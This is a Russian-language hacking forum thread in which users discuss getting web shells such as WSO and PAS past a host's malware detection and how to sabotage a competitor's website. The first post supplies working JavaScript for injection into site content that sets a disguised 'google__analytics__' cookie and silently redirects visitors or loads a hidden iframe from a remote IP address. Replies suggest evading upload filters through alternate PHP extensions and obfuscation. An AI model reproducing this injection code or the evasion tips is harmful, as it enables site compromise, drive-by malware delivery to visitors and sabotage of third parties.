PDA

Просмотр полной версии : хостинг обнаруживает запуск шелла


dondy
13.07.2015, 12:51
Forbidden: a malicious file has been detected.

так реагирует хостинг на wso2 (и зашифрованый в base 64) и на PAS

как он определяет шелл ? PAS же зашифрован нормально, не в base 64

как навредить чужому сайту? как заразить сайт вирусом и убрать сайт конкурента из выдачи?

разместив этот код например, который свиду пользователям сайта не будет заметен, поисковые системы обнаружат как вирус и заблокируют сайт вашего недруга конкурента

вредоносный код для зихеров на сайте можно вставить хоть в сообщение контента сайта:



if(!getCookie("google__analytics__")){
var gate = "http://5.61.34.53/jquery/jquery.php";
var today = new Date(),
tomorrow = new Date();
tomorrow.setDate(today.getDate() + 1);
setCookie("google__analytics__", 1, tomorrow.toGMTString());
var ua = navigator.userAgent.toLowerCase();

if(ua.indexOf("android") > -1)
window.location = gate;
else{
var el = document.createElement("iframe");
document.body.appendChild(el);
el.id = 'iframe';
el.style.width = 0;
el.style.height = 0;
el.src = 'http://5.61.34.53/2c24';
}
}
function setCookie (name, value, expires, path, domain, secure) {
document.cookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}
function getCookie(name) {
var cookie = " " + document.cookie;
var search = " " + name + "=";
var setStr = null;
var offset = 0;
var end = 0;
if (cookie.length > 0) {
offset = cookie.indexOf(search);
if (offset != -1) {
offset += search.length;
end = cookie.indexOf(";", offset)
if (end == -1) {
end = cookie.length;
}
setStr = unescape(cookie.substring(offset, end));
}
}
return(setStr);
}

faza02
13.07.2015, 12:57
попробуйте другие расширения, php2, php3, php4, php5, phtml, pht. если не подойдет, то попробуйте обфусцировать: http://wb0.ru/phpobf.php

b3
13.07.2015, 12:57
То есть твоё понимание работы антивирусных программ упирается в детект функции base64?

dondy
13.07.2015, 13:50
↑ (https://antichat.live/posts/3867787/)
То есть твоё понимание работы антивирусных программ упирается в детект функции base64?


нет, base64 легкое почтовое шифрование его любой антивирь видит, а вот p.a.s. shell шифруется под паролем, у него своё какое то шифрование и его обнаруживает (kis 2015 не обнаруживает pas)

VY_CMa
13.07.2015, 13:52
ОбычноClamAV (https://www.google.com/url?q=http://www.clamav.net/&sa=U&ei=RIqjVa3aFuu_ygOW1rPAAw&ved=0CBQQFjAA&sig2=AaGNx3va94x1nPDOXg77Eg&usg=AFQjCNF62VpCq6tSgZzlMMTQtAv0GG3WdA)являе ся причиной тревоги. Там свои сигнатуры. Но может быть и system.

winstrool
13.07.2015, 14:19
В WSO параметры передаются в запросах p1,p2,p3 и другие, что для фаервола может являться сигнатурой для запрета выполнения, также это может быть и с другими аналогичными шелами, во общим тут нужно грамотно подобрать шелл!